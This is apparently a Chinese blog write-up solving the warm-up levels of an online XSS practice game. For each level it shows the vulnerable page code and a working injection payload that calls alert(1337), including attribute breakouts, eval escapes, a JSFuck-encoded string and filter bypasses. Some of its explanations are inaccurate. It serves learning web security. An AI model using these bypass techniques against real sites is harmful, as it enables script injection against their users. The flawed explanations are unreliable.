XSS之xss game

于 2024-08-18 00:48:38 发布
阅读量632 收藏 13
点赞数 9
文章标签: 前端 javascript html 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68600196/article/details/141286884
版权

链接如下:

Challenges

1.Ma Spaghet!

源码;

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

 somebody=<img src=1 οnerrοr="alert(1337)">

解释:

  • innerHTML属性会解析并插入HTML内容。通过将somebody参数设置为含有<img>标签的payload,利用onerror事件触发alert(1337)
  • 由于innerHTML会将内容解释为HTML,<img>标签的onerror事件会在加载图片时触发。这里的src=1是一个无效的图片链接,将导致错误,从而触发onerror事件。

2.Jefff

源码:

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

 ?jeff=aaa";alert(1337);"

 

解释:

  • eval函数会执行动态生成的JavaScript代码。通过在jeff参数中注入";alert(1337);",可以破坏字符串的拼接,直接在eval中插入恶意代码。
  • aaa";alert(1337);"使得eval代码变成:ma = "Ma name aaa";alert(1337);。这样,alert(1337)就会被执行。

3.Ugandan Knuckles

源码:

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

 ?wey=aaa" οnfοcus="alert(1337)" autofocus="true 

 

解释:

  • innerHTML会解析为HTML内容。通过在placeholder属性中注入"onfocus事件,可以在文本框获得焦点时触发alert(1337)
  • onfocus="alert(1337)"在文本框被聚焦时触发警报。

4.Ricardo Milos

源码:

<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>

 ?ricardo=javascript:alert(1337)

 

解释:

  • action属性决定了表单提交的目标。当其设置为javascript:alert(1337)时,表单提交会执行JavaScript代码。
  • ricardo.submit()在2秒后提交表单,从而执行了alert(1337)

5.Ah That's Hawt

源码;

<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

?markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281337%2529"> 

 

解释:

  • 通过innerHTML插入带有onerror属性的<img>标签。onerror事件中的location="javascript:alert%25281337%2529"会触发JavaScript代码。
  • %2528%2529()的URL编码,确保字符串在JavaScript中正确解析。

6.Ligma

源码:

/* Challenge */
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

 访问链接:JSFuck - Write any JavaScript with 6 Characters: []()!+JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to execute code.icon-default.png?t=N7T8https://jsfuck.com/

 url编码后

 复制,最后payload为:

balls=%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%2B%5B!%5B%5D%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%2B(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D))%5B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B((%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%5D(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)()((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%5B%2B%5B%5D%5D%2B!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)

解释:

  • replace(/[A-Za-z0-9]/g, '')会去掉字符串中的所有字母和数字,只保留其他字符。如果balls参数是javascript:alert(1337),所有字母和数字会被删除,剩下的内容就是javascript:alert(1337),这会被eval执行。

7.Mafia

源码:

/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

  ?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

 ?mafia=eval(8680439..toString(30))(1337)

 ?mafia=eval(location.hash.slice(1))#alert(1337)

解释:

  • replace(/[\'"+-!\]/gi, ‘_’)替换了特定字符,并移除alert。不同的payload利用eval`执行不同的JavaScript代码:
    1. Function(/ALERT(1337)/.source.toLowerCase())()创建了一个执行alert(1337)的函数。
    2. eval(8680439..toString(30))(1337)是利用eval函数的动态执行。
    3. eval(location.hash.slice(1))#alert(1337)利用hash参数注入代码。

8.Ok, Boomer

源码:

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

  ?boomer=<a%20id=ok%20href=mailto:alert(1337)>

解释:

  • DOMPurify.sanitize用于清理和过滤输入内容。通过<a>标签并利用href属性注入mailto:协议,虽然DOMPurify会过滤大多数内容,但在实际应用中,如果过滤规则不够严格,可能会执行注入的代码。

至此,xss game的Warmups部分已结束!

@DKX
关注
  • 9
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xssgame.zip
06-10
在这个“xssgame.zip”压缩包中,我们有一个名为“xss小游戏靶场”的练习平台,旨在帮助用户了解和学习如何防范XSS攻击。这个靶场可能包含了多个级别,每个级别代表了不同类型的XSS漏洞,比如反射型XSS、存储型XSS和...
xss game挑战笔记.pdf
02-11
### XSS Game挑战笔记知识点概述 #### 一、XSS攻击简介 XSS(Cross Site Scripting)即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时,嵌入其中的...
xss游戏平台源码
12-12
在深入探讨这些知识点之前,我们首先要理解什么是XSS(Cross-site scripting)攻击。XSS攻击是网络应用安全领域常见的一种类型,攻击者通过在网页上注入恶意脚本,从而影响用户浏览器的行为。在游戏平台的场景下,...
xssgame:test.xss.tv的原始代码,自己删除掉了后面重置的Flash XSS翻译,替换了一些无聊的表情包
03-23
在这个压缩包文件"**xssgame-master**"中,我们可以深入研究每一关的实现,从基础到进阶,逐步揭示XSS攻击的各种形态。游戏共包含1-15关,每关都对应一种或多种XSS攻击方式。开发者通过删除了原本的Flash XSS翻译并...
学习网站1
08-08
同时,Firing Range、XSS Challenges和XSS Game提供了更多的训练环境,让你可以通过解决实际问题来增强对XSS防御的理解。 SQL注入则是另一种常见的Web应用漏洞,攻击者通过输入恶意的SQL语句,欺骗服务器执行非预期...
ASP.NET Core Web API 使用Autofac框架
鲤籽鲲的博客
08-08 661
ASP.NET Core Web API 使用Autofac框架
JAVA-WEB资源配置
caryeko的专栏
08-15 184
用JAVA进行编写WEB项目时,我们一般需要对WEB进行统一配置,例如制定拦截路径、页面解析器、跨域配置、fastjson报文解析、文件上传大小配置等。
使用WebSocket实现一个简易的聊天室
qq_51321722的博客
08-14 396
其次,要有相关配置类以及Controller。我这里的框架是SpringBoot。首先,我们要有一个前端页面。
vue2前端阿里云oss服务端签名直传
weixin_74285634的博客
08-13 286
generatePresignedUrlApi是由后端提供的接口 来获取密钥。
提升前端性能的JavaScript技巧
han2434的博客
08-14 795
一个快速响应、高效运行的Web页面不仅能提升用户体验,还能在一定程度上影响网站的SEO排名。本文汇总了一系列JavaScript技巧,以帮助开发者提升前端性能,并提供实际的代码示例。
vue-lic(三)
qq_64669006的博客
08-14 262
Vue 应用中的跨域问题通常是由于浏览器的同源策略引起的,它阻止了一个源(origin)的网页上的JavaScript 代码请求另一个源的资源。也就是说,只要https://www.baidu.com中https://,www.baidu,.com中有一个不一样,就会导致存在跨域问题。2.逆向传递数据(vue不支持逆向传递)-->子组件给父组件传递,通过$emit("事件名",要传递的数据)自定义监听事件。,这里因为本身就有/api,再添加了一个/api,所以需要去掉一个/api,也就是重写路径。
vue3 组合式 API:setup()
最新发布
咸鱼滚滚
08-17 687
setup()props和contextprops:包含了父组件传递给当前组件的属性。可以通过解构赋值的方式获取特定的属性。context:包含了一些与组件相关的上下文信息,如attrsslotsemit等。可以通过解构赋值的方式获取特定的上下文信息。示例:< script setup lang = " ts " > // defineProps 用于定义组件接收的父组件传递过来的属性(props)。// defineExpose 用于明确指定哪些属性和方法可以在组件外部被访问。import {
微信小程序电话号码授权
qq_36022463的博客
08-16 153
文档:https://developers.weixin.qq.com/miniprogram/dev/OpenApiDoc/user-info/phone-number/getPhoneNumber.html。文档:https://developers.weixin.qq.com/miniprogram/dev/framework/open-ability/getPhoneNumber.html。掉这个获取电话号码,需要先获取access_token。获取token,有效期是两小时,需要缓存,
尚品汇-前端面包屑平台属性、排序处理(三十三)
dengfengling999的博客
08-17 317
早期单一服务器,用户认证。缺点:单点性能压力,无法扩展分布式,SSO(single sign on)模式解决 :用户身份信息独立管理,更好的分布式管理。可以自己扩展安全策略跨域不是问题缺点:认证服务器访问压力较大。业务流程图{用户访问业务时,必须登录的流程}{单点登录的过程}
总结常见报错信息
m0_68903702的博客
08-16 174
在@Controller注解中,返回的是字符串或者是字符串匹配的模板名称,即直接渲染视图,与html页面配合使用的,java后端的代码要结合html的情况进行渲染,使用model对象(或者modelandview)的数据将填充user视图中的相关属性,然后展示到浏览器;而在@RestController中,返回的应该是一个对象,即return一个user对象,这时,在没有页面的情况下,也能看到返回的是一个user对象对应的json字符串。情形一:若前端传入Json格式,后端使用。
NVDLA专题4:具体模块介绍——Convolution DMA
fangfanglovezhou的博客
08-14 565
NVDLA专题4:具体模块介绍——Convolution DMA
前端实现接口调用进度百分比
qq_42072014的博客
08-14 171
通过本文,我们学习了如何使用 XMLHttpRequest 和 Fetch API 在前端实现接口调用进度百分比的显示。这些技术可以帮助提升用户体验,特别是在涉及文件上传或大型数据传输的场景中。如果你在实现过程中遇到任何问题,欢迎随时提问。
uniapp 中 web-view 向 App 传递消息
Cang_Ye的博客
08-14 255
在web项目中引入官方库 uni.webview.1.5.4.js ,
WebRTC音视频开发读书笔记(二)
ch_s_t的专栏
08-15 1024
视频分辨率是指视频所成图像内包含的像素数量.通常视频在同样大小的屏幕下,分辨率越高,所包含的像素就越多,视频画面就越细腻、越清晰。常见分高清720P: 1280*720超清1080P: 1920*1080。
xssgame靶场搭建
05-17
XSS Game是一个由Google提供的在线Web安全学习平台,旨在帮助开发人员学习和了解如何识别和利用Web应用程序中的跨站点脚本(XSS)漏洞。它提供了一系列有趣且互动的挑战,以帮助用户了解XSS漏洞的工作原理,从而提高他们在Web应用程序安全方面的技能。 如果你想自己搭建XSS Game靶场,你需要做以下几步: 1. 下载XSS Game靶场代码 你可以在GitHub上下载XSS Game靶场的源代码:https://github.com/google/security-research-pocs/tree/master/web-platform/xss-game 2. 安装和配置Web服务器 你需要安装和配置Web服务器来托管XSS Game靶场。你可以选择Apache、Nginx等常见的Web服务器。 3. 将XSS Game靶场代码放到Web服务器目录下 将下载的XSS Game靶场代码放到Web服务器的根目录下,确保它们可以通过浏览器访问。 4. 配置数据库 XSS Game靶场使用数据库存储用户信息和挑战进度等信息。你需要安装和配置MySQL数据库,并将配置信息添加到XSS Game靶场代码中。 5. 启动Web服务器 启动Web服务器并打开浏览器,访问XSS Game靶场网址即可开始挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值